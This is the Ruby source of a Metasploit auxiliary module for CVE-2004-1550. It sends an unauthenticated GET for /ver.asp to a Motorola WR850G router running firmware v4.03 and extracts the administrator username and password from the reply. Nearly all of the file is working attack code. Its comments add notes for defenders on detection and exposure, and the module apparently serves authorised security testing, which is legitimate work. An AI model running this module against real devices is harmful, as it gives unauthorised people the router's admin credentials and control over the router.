GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/admin/motorola/wr850g_cred.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Auxiliary module for CVE-2004-1550 (Motorola WR850G, firmware v4.03).
#
# Per the module description, the router answers an unauthenticated
# GET for /ver.asp with the admin username and password while an
# administrator session is active.
#
# Notes for defenders and assessors:
# * Requests for /ver.asp that do not come from the administrator's own
#   host are the observable trace of this check, wherever HTTP traffic to
#   the management interface is logged or captured.
# * Keeping the management interface unreachable from untrusted networks
#   removes the exposure path this module relies on.
# * Recovered credentials are written to the console in clear text, so
#   console output and spooled logs should be handled as sensitive data.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Tcp

  # Registers module metadata (name, description, references, disclosure
  # date, stability notes) and defaults the target port to 80.
  #
  # @param info [Hash] metadata supplied by the framework, merged via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Motorola WR850G v4.03 Credentials',
        'Description' => %q{
          Login credentials to the Motorola WR850G router with
          firmware v4.03 can be obtained via a simple GET request
          if issued while the administrator is logged in. A lot
          more information is available through this request, but
          you can get it all and more after logging in.
        },
        'Author' => 'kris katterjohn',
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2004-1550' ],
          [ 'OSVDB', '10232' ],
          [ 'URL', 'https://seclists.org/bugtraq/2004/Sep/0339.html']
        ],
        'DisclosureDate' => '2004-09-24',
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'SideEffects' => [],
          'Reliability' => []
        }
      )
    )

    register_options([Opt::RPORT(80)])
  end

  # Sends one HTTP/1.0 GET for /ver.asp, then inspects the reply for the
  # http_username / http_passwd fields and prints them when both are found.
  #
  # Only the data returned by a single get_once read is examined, so a run
  # that prints nothing is not proof that the device is unaffected.
  def run
    connect
    sock.put("GET /ver.asp HTTP/1.0\r\n\r\n")
    reply = sock.get_once
    disconnect

    if reply.to_s.empty?
      print_status('No response from server')
      return
    end

    # Anything other than a "200 Ok" status line (the original comment
    # suggests a 302 redirect) is treated as "no admin session active".
    status_line = reply.split("\r\n").first
    unless /200 Ok/.match?(status_line)
      print_status('Administrator not logged in')
      return
    end

    # Each field is expected as "name=value<br>" on a single line.
    user = reply[/http_username=([^\n]*)<br>/, 1]
    pass = reply[/http_passwd=([^\n]*)<br>/, 1]

    # Nothing is printed unless both fields were located.
    return unless user && pass

    print_status("Found username \"#{user}\" and password \"#{pass}\"")
  end
end